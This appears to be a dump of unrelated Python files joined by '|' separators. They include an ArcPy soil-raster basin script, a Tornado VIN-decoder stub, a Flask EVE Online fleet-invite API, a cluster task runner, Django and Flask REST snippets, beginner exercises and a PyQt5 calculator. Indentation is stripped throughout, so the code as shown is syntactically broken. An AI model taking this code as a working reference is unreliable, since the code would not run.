# 1. Make sure the MapunitRaster_XX_10m raster has not been joined yet (Errors with field names? & Error 000049 : Failed to build attribute table)
# 2. Open ArcMap and import the muaggatt table from the gssurgo .gdb directory
# 3. Right click on the table -> export (as dBASE Table) -> save to SSURGO\XX\soils\mukey_join.dbf
# 4. Check that the mukey attribute is type long (not string), create new column if needed
# 5. Open windows command line and navigate to script (needs arcmap 10.6 -> python v2.7?)
# 5. Execute script
# --------------------------------------------------------------------------
# Import arcpy module
print 'Importing modules...'
import arcpy
import os
import os.path
import csv
import winsound
arcpy.env.overwriteOutput = True
# Check out any necessary licenses
arcpy.CheckOutExtension("spatial")
os.chdir("../..")
maindir = os.getcwd()
os.chdir("../../..")
gisdir = os.getcwd()
################### User Input #####################
###################################################
RFC = 'WGRFC_2021'
fx_group = '' # leave blank if not processing by fx group
#in_shp = maindir + '\\' + RFC[:5] + os.sep + RFC + '\\Shapefiles_from' + RFC[:5] + '\\calb_basins\\calb_basins_DES.shp'
in_shp = "E:\\TWDB_WGRFC\\basins\\210318_Calb_Basins_Joined\\Calb_Basins.shp"
#maindir + '\\' + RFC[:5] + os.sep + RFC + '\\Shapefiles_fromRFC\\calb_basins\\' + 'marfc_fy17_calb_basins.shp'
find_ch5id = 'Arc_Name_n' # attribute table header for basin id -> must exist!!!
#find_name = 'NAME' # optional: attribute table header for more basin info
state = 'TX'
# if you only want to run specific basins -> list them below
# otherwise set it equal to empty list (basins_overwrite = [] or basins_overwrite = ['COCF1'])
basins_overwrite = ['PPDT2']#
#ignore_basins = ['NWFM1','LOMM8','LTRM8','CYNM8','MRIM8','2802','ACMM8','BHLM8','DBMM8',]
# location of the state raster SSURGO data
State_gSSURGO_Raster = 'E:\\TWDB_WGRFC\\gSSURGO\\soils_GSSURGO_tx_3899944_01\\soils\\gssurgo_g_tx\\gSSURGO_TX.gdb\\MapunitRaster_10m'
join_table = 'E:\\TWDB_WGRFC\\gSSURGO\\soils_GSSURGO_tx_3899944_01\\soils\\gssurgo_g_tx' + '\\mukey_join.dbf'
#State_soil_table = r'Q:\GISLibrary\SSURGO\TN\soils\gssurgo_g_tn.gdb\muaggatt'
# Output directory for the basin .csv summary files
if fx_group != '':
output_dir = 'E:\\TWDB_WGRFC\\gSSURGO\\data_files\\'
else:
output_dir = 'E:\\TWDB_WGRFC\\gSSURGO\\data_files\\'
######################################################
################# End User Input ######################
print 'REMINDER: Check that mukey_join.dbf "mukey" field is type long!!!'
# original mukey column is "string" type and join will skip several instances
winsound.Beep(1000,700) # beep to indicate script is complete
#raw_input("Press enter to continue processing...")
#check that SSURGO file exits (may be named differently for older downloads)
if os.path.exists(os.path.dirname(State_gSSURGO_Raster)) == False:
print 'Can not find SSURGO raster for ' + state
print 'State GSSURGO Raster location: ' + State_gSSURGO_Raster
if not os.path.exists('C:\\NWS\\python\\temp_output\\'):
print "Missing directory: 'C:\\NWS\\python\\temp_output\\' -> please create"
raw_input("Press enter to continue processing...")
if not os.path.exists(output_dir):
print "Missing directory: " + output_dir + " -> please create"
raw_input("Press enter to continue processing...")
print 'setup ok so far...'
ignore_basins = []
#################################################################################
# use search cursor to loop through individual basins in shapefile
basins = arcpy.SearchCursor(in_shp)
fields = arcpy.ListFields(in_shp, "", "String")
#Process: Define Projection
check_project = in_shp[:-4] + '.prj'
if not os.path.exists(check_project):
sr = arcpy.SpatialReference(4269) # define projection of basin shp -> 4269 = GCS_North_American_1983
print 'Defining Projection...'
arcpy.DefineProjection_management(in_shp, sr)
# Search cursor info: http://resources.arcgis.com/de/help/main/10.1/index.html#//018w00000011000000
with arcpy.da.SearchCursor(in_shp, ("SHAPE@",find_ch5id)) as cursor: # search cursor gets "A geometry object for the feature" and the "NAME" attribute for each basin
for index, row in enumerate(cursor):
Basin_Boundary = row[0] # basin geometry
ch5id = row[1] # basin = find_ch5id
print 'Processing basin: ' + str(ch5id)
print 'ch5id = ' + row[1]
#print 'name = ' + row[2]
if ch5id not in ignore_basins:
## Local variables:
Basin_gSSURGO_Raster = 'C:\\NWS\\python\\temp_output\\x' + ch5id + 'go' #put an x in front of raster name (some basins start with number)
Model_Output_gdb = 'C:\\NWS\\python\\temp_output\\'
# Process: Extract by Mask
print 'Extracting raster with basin polygon...'
#arcpy.gp.ExtractByMask_sa(State_gSSURGO_Raster, Basin_Boundary, Basin_gSSURGO_Raster)
try:
arcpy.Clip_management(State_gSSURGO_Raster, "#", Basin_gSSURGO_Raster, Basin_Boundary, "0", "ClippingGeometry")
print 'Clip successful...'
gonogo = 'go'
except Exception as e:
if e.message[:12] == 'ERROR 001566':
print '!!!!! Basin appears to be outside ' + state + ' raster...skipping'
gonogo = 'no'
else:
print e.message
gonogo = 'no'
if gonogo == 'go':
# Build Basin Raster attribute table
print 'Building basin raster attribute table...'
arcpy.BuildRasterAttributeTable_management(Basin_gSSURGO_Raster,"Overwrite")
# Process: Join Field
print 'Joining "VALUE" and "hydgrpdcd" fields...'
try:
arcpy.JoinField_management(Basin_gSSURGO_Raster, "VALUE", join_table, "MUKEY", "hydgrpdcd")
print 'Join successful!'
except Exception as x:
if 'ERROR 000728' in x.message:
print 'Could not find VALUE in join... trying "mukey"'
arcpy.JoinField_management(Basin_gSSURGO_Raster, "MUKEY", join_table, "MUKEY", "hydgrpdcd")
print 'Join successful!'
else:
print 'error = ' + x.message
# Process: Table to Table
print 'Converting to .dbf table...'
# Process: Table to Table
arcpy.TableToTable_conversion(Basin_gSSURGO_Raster, Model_Output_gdb, "out_table.dbf", "", "VALUE \"VALUE\" false true true 0 Long 0 0 ,First,#,,VALUE,-1,-1,,Value,-1,-1;COUNT \"COUNT\" false true true 0 Long 0 0 ,First,#,,COUNT,-1,-1,,Count,-1,-1;MUKEY \"MUKEY\" true true false 30 Text 0 0 ,First,#,,MUKEY,-1,-1;hydgrpdcd \"Hydrologic Group - Dominant Conditions\" true true false 254 Text 0 0 ,First,#,,hydgrpdcd,-1,-1", "")
# Process: output csv file
print 'Creating '+ ch5id + '_gSSURGO.csv file...'
rows = arcpy.SearchCursor(Model_Output_gdb + '\\out_table.dbf')
#check if output file already exits
if os.path.isfile(output_dir + ch5id + '_gSSURGO.csv') == True:
print 'Appending data to existing basin csv file...'
header = True
else:
header = False
ssurgo_csv = open(output_dir + ch5id + '_gSSURGO.csv', 'ab')
csvFile = csv.writer(ssurgo_csv) #output csv
fieldnames = [f.name for f in arcpy.ListFields(Model_Output_gdb+ '\\out_table.dbf')]
allRows = []
for row in rows:
rowlist = []
for field in fieldnames:
rowlist.append(row.getValue(field))
allRows.append(rowlist)
if header == False:
csvFile.writerow(fieldnames)
for row in allRows:
csvFile.writerow(row)
row = None
rows = None
ssurgo_csv.close()
print '\n'
print 'Script completed!!'
winsound.Beep(800,1000) # beep to indicate script is complete
|
#!/usr/bin/env python2.7
# coding:utf-8
import sys
import os
import logging
import json
try:
import tornado.ioloop
import tornado.web
import tornado.escape
from tornado.options import define, options
except ImportError:
print "Notify service need tornado, please run depend.sh"
sys.exit(1)
ROOT_DIR = os.path.dirname(__file__)
sys.path.append(ROOT_DIR)
define("port", default=10089, help="run on the given port", type=int)
define('debug', default=True, help='enable debug mode')
class MainHandler(tornado.web.RequestHandler):
def get(self):
html = """
<h1>Welcome Vin Decoder</h1>
<br>
<ul>
<li><a href="/">Home</a></li>
<li><a href="/demo">Demo</a></li>
</ul>
"""
self.write(html)
class DemoHandler(tornado.web.RequestHandler):
def get(self):
self.redirect("/vin/v1/LVSHCAMB1CE054249")
class VinCodeHandler(tornado.web.RequestHandler):
def get(self, vincode):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Content-Type", "application/json;charset=UTF-8")
res = {
"status": "20000000",
"message": "ok",
"result": {
"vincode": vincode.encode("utf-8"),
"厂家": "一汽大众(奥迪)",
"品牌": "奥迪",
"车型": "Q5",
"VIN年份": "2013",
"排放标准": "国4",
"进气形式": "涡轮增压",
"排量(升)": "2.0 T",
"最大马力(ps)": "211",
"驱动形式": "前置四驱",
"变速器描述": "手自一体变速器(AMT)",
"档位数": "8",
"燃油类型": "汽油",
}
}
self.write(json.dumps(res, ensure_ascii=False))
def main():
tornado.options.parse_command_line()
settings = {
'debug': options.debug,
}
application = tornado.web.Application([
(r"/", MainHandler),
(r"/demo", DemoHandler),
(r"/vin/v1/(\w+)", VinCodeHandler),
], **settings)
application.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
from flask.blueprints import Blueprint
import logging
from flask_login import login_required, current_user
import flask
from flask.globals import request
from waitlist.permissions import perm_manager
from waitlist.storage.database import CrestFleet, Waitlist, \
Character, WaitlistEntry, HistoryEntry, HistoryExtInvite, \
TeamspeakDatum
from waitlist.utility.notifications import send_notification
from waitlist.utility.history_utils import create_history_object
from waitlist.utility.fleet import spawn_invite_check, invite, member_info
from flask.json import jsonify
from waitlist.base import db
from datetime import datetime
from flask.wrappers import Response
from waitlist.utility.eve_id_utils import get_character_by_name
from flask.helpers import make_response
from waitlist.ts3.connection import move_to_safety_channel
from waitlist.utility.settings import sget_active_ts_id
from flask_babel import gettext
from ...signal import send_removed_fleet, send_removed_last_fleet
bp = Blueprint('api_fleet', __name__)
logger = logging.getLogger(__name__)
perm_manager.define_permission('fleet_management')
perm_fleet_manage = perm_manager.get_permission('fleet_management')
@bp.route("/<int:fleet_id>/", methods=["DELETE"])
@login_required
@perm_fleet_manage.require(http_exception=401)
def remove_fleet(fleet_id: int):
logger.info("%s deletes crest fleet %i", current_user.username, fleet_id)
fleet: CrestFleet = db.session.query(CrestFleet).get(fleet_id)
reg_time: datetime = fleet.registrationTime
db.session.query(CrestFleet).filter(CrestFleet.fleetID == fleet_id).delete()
db.session.commit()
send_removed_fleet(remove_fleet, fleet_id, reg_time)
if db.session.query(CrestFleet).count() <= 0:
send_removed_last_fleet(remove_fleet, fleet_id)
return flask.jsonify(status_code=200, message="Fleet Deleted")
@bp.route("/fleet/actions/invite/<string:name>", methods=['POST'])
@login_required
@perm_fleet_manage.require()
def fleet_actions_invite(name: str):
character = get_character_by_name(name)
fleet = current_user.fleet
if fleet is None:
logger.info("%s tried to invite someone by name while he has no fleet",
current_user)
flask.abort(428, gettext('You are not associated with a fleet!'))
if character is None:
logger.info('%s tried to inviate character with name=%s who does not exist.',
current_user,
name)
flask.abort(400,
gettext('The character you tried to invite could not be found!'))
logger.info("%s invites %s by name to fleet %d", current_user.username,
name, fleet.fleetID)
status = invite(character.id, [(fleet.dpsWingID, fleet.dpsSquadID),
(fleet.otherWingID, fleet.otherSquadID),
(fleet.sniperWingID, fleet.sniperSquadID),
(fleet.logiWingID, fleet.logiSquadID)])
h_entry = create_history_object(character.get_eve_id(),
HistoryEntry.EVENT_COMP_INV_BY_NAME,
current_user.id)
db.session.add(h_entry)
resp = flask.jsonify({'status': status['status_code'],
'message': status['text']})
resp.status_code = status['status_code']
return resp
@bp.route("/fleet/members/", methods=['POST'])
@login_required
@perm_fleet_manage.require(http_exception=401)
def invite_to_fleet():
character_id = int(request.form.get('charID'))
waitlist_id = int(request.form.get('waitlistID'))
group_id = int(request.form.get('groupID'))
character = db.session.query(Character).get(character_id)
waitlist = db.session.query(Waitlist).filter(Waitlist.id == waitlist_id).first()
# lets check that the given wl exists
if waitlist is None:
logger.error("Given waitlist ID=%d is not valid.", waitlist_id)
resp = jsonify(status_code=428,
message=gettext('Given waitlist ID=%(waitlist_id)d is not valid.',
waitlist_id=waitlist_id))
resp.status_code = 428
return resp
squad_type = waitlist.name
logger.info("Invited %s by %s into %s", character.eve_name, current_user.username, squad_type)
if current_user.fleet is None:
logger.info("%s is currently not not boss of a fleet, he can't invite people.", current_user.username)
resp = jsonify(status_code=409,
message=gettext('You are not currently Boss of a Fleet'))
resp.status_code = 409
return resp
fleet = current_user.fleet
# generate a list in which order squads should be preferred in case the main squad is full
if squad_type == "logi":
squad_id_list = [(fleet.logiWingID, fleet.logiSquadID), (fleet.otherWingID, fleet.otherSquadID),
(fleet.sniperWingID, fleet.sniperSquadID), (fleet.dpsWingID, fleet.dpsSquadID)]
elif squad_type == "dps":
squad_id_list = [(fleet.dpsWingID, fleet.dpsSquadID), (fleet.otherWingID, fleet.otherSquadID),
(fleet.sniperWingID, fleet.sniperSquadID), (fleet.logiWingID, fleet.logiSquadID)]
elif squad_type == "sniper":
squad_id_list = [(fleet.sniperWingID, fleet.sniperSquadID), (fleet.otherWingID, fleet.otherSquadID),
(fleet.dpsWingID, fleet.dpsSquadID), (fleet.logiWingID, fleet.logiSquadID)]
else:
return Response(flask.jsonify({'message': gettext('Unknown Squad Type')}), 415)
# invite over crest and get back the status
status = invite(character_id, squad_id_list)
if status['status_code'] != 204:
resp = jsonify({'status': status['status_code'], 'message': status['text']})
resp.status_code = status['status_code']
else:
logger.info("Creating empty content response")
resp = make_response('', 204)
if resp.status_code != 204: # invite failed send no notifications
if resp.status_code != 520:
logger.info("Invited %s by %s into %s failed, status_code %s message %s",
character.eve_name, current_user.username, squad_type,
resp.status_code, status['text'])
return resp
send_notification(character_id, waitlist_id)
h_entry = create_history_object(character.get_eve_id(), HistoryEntry.EVENT_COMP_INV_PL, current_user.id)
h_entry.exref = waitlist.group.groupID
# create a invite history extension
# get wl entry for creation time
wl_entry = db.session.query(WaitlistEntry) \
.filter((WaitlistEntry.waitlist_id == waitlist_id) & (WaitlistEntry.user == character_id)).first()
if wl_entry is None:
logger.info("Waitlist Entry with ID=%d does not exist!", waitlist_id)
return resp
db.session.add(h_entry)
db.session.flush()
db.session.refresh(h_entry)
history_ext = HistoryExtInvite()
history_ext.historyID = h_entry.historyID
history_ext.waitlistID = waitlist_id
history_ext.timeCreated = wl_entry.creation
history_ext.timeInvited = datetime.utcnow()
db.session.add(history_ext)
db.session.commit()
logger.info("%s invited %s to fleet from %s.", current_user.username, character.eve_name, waitlist.group.groupName)
# set a timer for 1min and 6s that checks if the person accepted the invite
logger.debug("API Response for %s was %d", character.eve_name, resp.status_code)
if resp.status_code == 204:
try:
spawn_invite_check(character_id, group_id, fleet.fleetID)
except Exception:
logger.exception('Failed to spawn invite check')
else:
logger.debug(f"Did not get 204 status, instead got {resp.status_code} no invite check spawned")
return resp
@bp.route("/fleet/movetosafety/", methods=['POST'])
@login_required
@perm_fleet_manage.require(http_exception=401)
def move_fleetmembers_to_safety():
fleet_id = int(request.form.get('fleetID'))
crest_fleet = db.session.query(CrestFleet).get(fleet_id)
if not crest_fleet.comp.get_eve_id() == current_user.get_eve_id():
flask.abort(403, "You are not the Fleet Comp of this fleet!")
teamspeak_id = sget_active_ts_id()
if teamspeak_id is None:
flask.abort(500, "No TeamSpeak Server set!")
teamspeak: TeamspeakDatum = db.session.query(TeamspeakDatum).get(teamspeak_id)
if teamspeak.safetyChannelID is None:
flask.abort(500, "No TeamSpeak Safety Channel set!")
# get the safety fleet channel id
member = member_info.get_fleet_members(fleet_id, crest_fleet.comp)
for charID in member:
char_id: int = member[charID].character_id()
char = db.session.query(Character).get(char_id)
if char is None:
continue
safety_channel_id: int = teamspeak.safetyChannelID
move_to_safety_channel(char.eve_name, safety_channel_id)
return make_response("OK", 200)
|
#!/usr/bin/env python
"""
This is a very KLUDGY beowulf beorun'able task which unfortunately loads a lot of modules,
thus being inefficient when compared with the preferred parallel-IPython method.
Called using:
beorun /home/dstarr/src/TCP/Software/ingest_tools/beowulf_task_regenerate_vosource_xmls.py /home/dstarr/scratch/Noisification/50nois_20epch_100need_0.050mtrc_frq17.9/generated_vosource/100018609_11.6262227104.xml /home/dstarr/scratch/Noisification/50nois_20epch_100need_0.050mtrc_frq17.9/generated_vosource/100018609_11.6262227104.xml /home/dstarr/scratch/Noisification/50nois_20epch_100need_0.050mtrc_frq17.9/generated_vosource/100018609_11.6262227104.xml
"""
import os,sys
os.environ['TCP_SEX_BIN']=os.path.expandvars('$HOME/bin/sex')
os.environ['TCP_WCSTOOLS_DIR']=os.path.expandvars('$HOME/src/install/wcstools-3.6.4/bin/')
os.environ['TCP_DIR']=os.path.expandvars('$HOME/src/TCP/')
os.environ['TCP_DATA_DIR']=os.path.expandvars('$HOME/scratch/TCP_scratch/')
os.environ['CLASSPATH']=os.path.expandvars('$HOME/src/install/weka-3-5-7/weka.jar')
sys.path.append(os.path.abspath(os.environ.get("TCP_DIR") + \
'Software/feature_extract'))
sys.path.append(os.path.abspath(os.environ.get("TCP_DIR") + \
'Software/feature_extract/Code'))
from Code import *
import db_importer
class QueueTasks:
""" Queue the tasks.
Called by regenerate_vosource_xmls.py instead of IPython parallel code.
"""
def main(self, xml_fpath_list):
"""
Input: list of xml_files for processing.
"""
# TODO: for each set of (10) xmls, write to random-filepath
# and store in a list for beorun
class ProcessTasks:
""" Process the given xmls (task) described in given filepath.
"""
def __init__(self, pars={}):
self.pars = pars
def thread_task(self, line):
""" Task which is threaded
"""
signals_list = []
gen = generators_importers.from_xml(signals_list)
#gen.generate(xml_handle="/home/dstarr/scratch/Noisification/50nois_20epch_100need_0.050mtrc_frq17.9/generated_vosource/100018609_11.6262227104.xml")
gen.generate(xml_handle=line)
gen.sig.add_features_to_xml_string(gen.signals_list)
str_i_1 = line.rfind('/')
str_i_2 = line.rfind('/', 0, str_i_1)
out_fpath = "%s/featured_vosource/%s" % (line[:str_i_2], line[str_i_1+1:])
#gen.sig.write_xml(out_xml_fpath="/home/dstarr/scratch/Noisification/50nois_20epch_100need_0.050mtrc_frq17.9/featured_vosource/100018609_11.6262227104.xml")
gen.sig.write_xml(out_xml_fpath=out_fpath)
def main(self):
"""
"""
import time
import datetime
import threading
import copy
#import socket
#print socket.gethostname()
fp = open(self.pars['task_fpath'])
lines = fp.readlines()
fp.close()
# TODO:
# I start 10 threads
# I want to have each thread with a start datetime.
# - I sleep(1)
# - I then check for sources with isalive()
# - False: I join() & increment number of tasks_to_queue + 1
# - True: I check that dtime.now < dtime + 1 minute.
# - if too old, I .join(0.1)
# - otherwise, pass.
max_seconds_thread_lifetime = 180
n_tasks_to_thread = 1
running_threads = []
while ((len(lines) > 0) or
((len(lines) == 0) and (len(running_threads) > 0))):
while (len(lines) > 0) and ((len(running_threads) < n_tasks_to_thread)):
# add some running threads
line_raw = lines.pop()
line = line_raw.strip()
t = threading.Thread(target=self.thread_task, args=[copy.copy(line)])
t.start()
now = datetime.datetime.utcnow()
#print ">>>>>>>>>", now, "tasked:", line
running_threads.append((now,t))
time.sleep(3)
i_remove_list = []
for i,(dtime,t) in enumerate(running_threads):
if not t.isAlive():
i_remove_list.append(i)
t.join(0.01)
else:
if dtime < (datetime.datetime.utcnow() - \
datetime.timedelta(seconds=max_seconds_thread_lifetime)):
i_remove_list.append(i)
#print "################", datetime.datetime.utcnow()
t.join(0.01) # I force a join in 0.1 seconds, regardless
i_remove_list.sort(reverse=True)
for i in i_remove_list:
running_threads.pop(i)
#print "DONE", datetime.datetime.utcnow()
if __name__ == '__main__':
pars = {'task_fpath':sys.argv[1]}
pt = ProcessTasks(pars=pars)
pt.main()
|
from django.shortcuts import render
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .serializers import Todo_list_serializer
from .models import Todo_list_model
@api_view(['GET'])
def api_overview(request):
api_urls = {
'List': '/task-list/',
'Detail View': '/task-detail/<int:pk>/',
'Create': '/task-create/',
'Update': '/task-update/<int:pk>/',
}
return Response(api_urls)
@api_view(['GET'])
def tasks_list(request):
tasks = Todo_list_model.objects.all()
serializer = Todo_list_serializer(tasks, many=True)
return Response(serializer.data)
@api_view(['GET'])
def task_detail(request, pk):
tasks = Todo_list_model.objects.get(id=pk)
serializer = Todo_list_serializer(tasks, many=False)
return Response(serializer.data)
@api_view(['POST'])
def task_create(request):
serializer = Todo_list_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
@api_view(['PUT'])
def task_update(request, pk):
task = Todo_list_model.objects.get(id=pk)
serializer = Todo_list_serializer(instance=task, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
@api_view(['DELETE'])
def task_delete(request, pk):
task = Todo_list_model.objects.get(id=pk)
task.delete()
return Response('Task deleted!')
|
#Write a Python program that accepts a word from the user and reverse it
word = input("Input a word to reverse: ")
# range - start, end, step
#len(word) - 1
# -1
# -1
i = len(word) - 1
while i > -1:
print(word[i], end="")
i = i - 1
print("\n")
#word = input("Input a word to reverse: ")
#for char in range(len(word) - 1, -1, -1):
#print(word[char], end="")
#print("\n")
|
h = int(raw_input().strip())
m = int(raw_input().strip())
nums = ["zero", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten",
"eleven", "twelve", "thirteen", "fourteen", "fifteen", "sixteen", "seventeen", "eighteen", "nineteen", "twenty",
"twenty one", "twenty two", "twenty three", "twenty four", "twenty five", "twenty six", "twenty seven", "twenty eight", "twenty nine"]
if m == 0: print "%s o' clock" % nums[h]
elif m == 1: print "one minute past %s" % nums[h]
elif m ==15: print "quarter past %s" % nums[h]
elif m == 30: print "half past %s" % nums[h]
elif m == 45: print "quarter to %s" % nums[h + 1]
elif m == 59: print "one minute to %s" % nums[h + 1]
elif m < 30: print "%s minutes past %s" % (nums[m], nums[h])
else: print "%s minutes to %s" % (nums[60 - m], nums[h + 1])
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:hua
# -*- coding:utf-8 -*-
from flask import Flask
from blue_print.users import users_blue
from blue_print.orders import orders_blue
from blue_print.kmeans import kmeans_blue
from blue_print.goods import goods_blue
from blue_print.random_tree import random_tree_blue
app = Flask(__name__)
# 将蓝图注册到app
app.register_blueprint(users_blue, url_prefix='/users')
app.register_blueprint(orders_blue,url_prefix='/orders')
app.register_blueprint(goods_blue, url_prefix='/goods')
app.register_blueprint(kmeans_blue, url_prefix='/kmeans')
app.register_blueprint(random_tree_blue,url_prefix='/random_tree')
# @app.route('/')
# def index():
# return "index"
if __name__ == '__main__':
# print(app.url_map)
app.run(debug=True)
# 启用多线程
# app.run(debug=False,threaded=True)
# 启用多进程,但是在win系统下进程数不能超过1,否则报错
# app.run(processes=1)
|
from rest_framework import serializers
from question.models import Question
class QuestionSerializer(serializers.ModelSerializer):
class Meta:
model=Question
fields=("title","body","publish","update","author","score") |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'calculator.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
import math
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(455, 382)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.button1 = QtWidgets.QPushButton(self.centralwidget)
self.button1.setGeometry(QtCore.QRect(60, 200, 51, 51))
self.button1.setObjectName("button1")
self.button2 = QtWidgets.QPushButton(self.centralwidget)
self.button2.setGeometry(QtCore.QRect(130, 200, 51, 51))
self.button2.setObjectName("button2")
self.button3 = QtWidgets.QPushButton(self.centralwidget)
self.button3.setGeometry(QtCore.QRect(200, 200, 51, 51))
self.button3.setObjectName("button3")
self.button6 = QtWidgets.QPushButton(self.centralwidget)
self.button6.setGeometry(QtCore.QRect(200, 140, 51, 51))
self.button6.setObjectName("button6")
self.button5 = QtWidgets.QPushButton(self.centralwidget)
self.button5.setGeometry(QtCore.QRect(130, 140, 51, 51))
self.button5.setObjectName("button5")
self.button4 = QtWidgets.QPushButton(self.centralwidget)
self.button4.setGeometry(QtCore.QRect(60, 140, 51, 51))
self.button4.setObjectName("button4")
self.button9 = QtWidgets.QPushButton(self.centralwidget)
self.button9.setGeometry(QtCore.QRect(200, 80, 51, 51))
self.button9.setObjectName("button9")
self.button8 = QtWidgets.QPushButton(self.centralwidget)
self.button8.setGeometry(QtCore.QRect(130, 80, 51, 51))
self.button8.setObjectName("button8")
self.button7 = QtWidgets.QPushButton(self.centralwidget)
self.button7.setGeometry(QtCore.QRect(60, 80, 51, 51))
self.button7.setObjectName("button7")
self.button0 = QtWidgets.QPushButton(self.centralwidget)
self.button0.setGeometry(QtCore.QRect(60, 260, 51, 51))
self.button0.setObjectName("button0")
self.add = QtWidgets.QPushButton(self.centralwidget)
self.add.setGeometry(QtCore.QRect(280, 260, 51, 51))
self.add.setObjectName("add")
self.division = QtWidgets.QPushButton(self.centralwidget)
self.division.setGeometry(QtCore.QRect(280, 80, 51, 51))
self.division.setObjectName("division")
self.subtract = QtWidgets.QPushButton(self.centralwidget)
self.subtract.setGeometry(QtCore.QRect(280, 200, 51, 51))
self.subtract.setObjectName("subtract")
self.multiply = QtWidgets.QPushButton(self.centralwidget)
self.multiply.setGeometry(QtCore.QRect(280, 140, 51, 51))
self.multiply.setObjectName("multiply")
self.equals = QtWidgets.QPushButton(self.centralwidget)
self.equals.setGeometry(QtCore.QRect(340, 260, 51, 51))
self.equals.setObjectName("equals")
self.Delete = QtWidgets.QPushButton(self.centralwidget)
self.Delete.setGeometry(QtCore.QRect(130, 260, 51, 51))
self.Delete.setObjectName("Delete")
self.allClear = QtWidgets.QPushButton(self.centralwidget)
self.allClear.setGeometry(QtCore.QRect(200, 260, 51, 51))
self.allClear.setObjectName("allClear")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(60, 15, 331, 41))
font = QtGui.QFont()
font.setFamily("Comic Sans MS")
font.setPointSize(12)
self.label.setFont(font)
self.label.setAcceptDrops(False)
self.label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.label.setAutoFillBackground(True)
self.label.setFrameShape(QtWidgets.QFrame.Box)
self.label.setLineWidth(2)
self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label.setObjectName("label")
self.label.setText('0')
self.square = QtWidgets.QPushButton(self.centralwidget)
self.square.setGeometry(QtCore.QRect(340, 140, 51, 51))
self.square.setObjectName("square")
self.mod = QtWidgets.QPushButton(self.centralwidget)
self.mod.setGeometry(QtCore.QRect(340, 200, 51, 51))
self.mod.setObjectName("mod")
self.pi = QtWidgets.QPushButton(self.centralwidget)
self.pi.setGeometry(QtCore.QRect(340, 80, 51, 51))
self.pi.setObjectName("pi")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 455, 21))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.button0.clicked.connect(lambda: self.clicked("0"))
self.button1.clicked.connect(lambda: self.clicked("1"))
self.button2.clicked.connect(lambda: self.clicked("2"))
self.button3.clicked.connect(lambda: self.clicked("3"))
self.button4.clicked.connect(lambda: self.clicked("4"))
self.button5.clicked.connect(lambda: self.clicked("5"))
self.button6.clicked.connect(lambda: self.clicked("6"))
self.button7.clicked.connect(lambda: self.clicked("7"))
self.button8.clicked.connect(lambda: self.clicked("8"))
self.button9.clicked.connect(lambda: self.clicked("9"))
self.add.clicked.connect(lambda: self.clicked("+"))
self.division.clicked.connect(lambda: self.clicked("/"))
self.subtract.clicked.connect(lambda: self.clicked("-"))
self.multiply.clicked.connect(lambda: self.clicked("*"))
self.equals.clicked.connect(lambda: self.clicked("=")) # self check
self.square.clicked.connect(lambda: self.clicked("$")) # self check
self.mod.clicked.connect(lambda: self.clicked("%"))
self.pi.clicked.connect(lambda: self.clicked("<")) # self check
self.allClear.clicked.connect(lambda: self.clicked(":")) # self check
self.Delete.clicked.connect(lambda: self.clicked(";")) # self check
def __init__(self):
self.globalString = '0'
self.globalSet = {'+', '/', '-', '*', '=', '$',\
'%', '<', ':', ';', '.'}
self.symbolsForLengthGT0 = {'+', '/', '-', '*', '%', '.'}
self.equalLastOperator = False
def emptyGlobal(self):
return len(self.globalString) == 1 and self.globalString[0] == '0'
def lastChar(self) -> str:
if (self.emptyGlobal()): return ''
return self.globalString[-1]
def isLastCharOperator(self):
return 1 if self.lastChar() in self.globalSet else 0
def clicked(self, text):
if self.equalLastOperator and text.isdigit() and text != '=':
self.clear()
self.equalLastOperator = False
if text.isdigit():
if (len(self.globalString) == 1 and self.globalString[0] == '0'):
self.globalString = text
else:
self.globalString += text
elif text == ';':
self.delete()
elif text == ':':
self.clear()
elif text == '<' and (self.emptyGlobal() or\
(self.isLastCharOperator() and self.lastChar() != '.')):
if self.emptyGlobal():
self.globalString = str(round(math.pi, 4))
else:
self.globalString += str(round(math.pi, 4))
elif text == '-' and not(self.isLastCharOperator()):
self.globalString += text
elif len(self.globalString) > 0:
if not(self.isLastCharOperator()):
if text == '$':
self.globalString += '**2'
elif text == '=':
self.equal()
elif text in self.symbolsForLengthGT0:
self.globalString += text
self.update()
def clear(self):
self.globalString = '0'
def delete(self):
if not(self.emptyGlobal()):
self.globalString = self.globalString[:-1]
if len(self.globalString) == 0:
self.globalString = '0'
while not(self.emptyGlobal()) and not(self.lastChar().isdigit()):
self.globalString = self.globalString[:-1]
def equal(self):
if not(self.isLastCharOperator()):
try:
x = eval(self.globalString)
x = str(round(x, 5))
if x.endswith('.0'):
x = x[:-2]
self.globalString = x
except:
self.globalString = 'hehe xd noob'
self.equalLastOperator = True
def update(self):
print(self.globalString)
self.globalString = str(self.globalString)
self.label.setText(self.globalString)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.button1.setText(_translate("MainWindow", "1"))
self.button2.setText(_translate("MainWindow", "2"))
self.button3.setText(_translate("MainWindow", "3"))
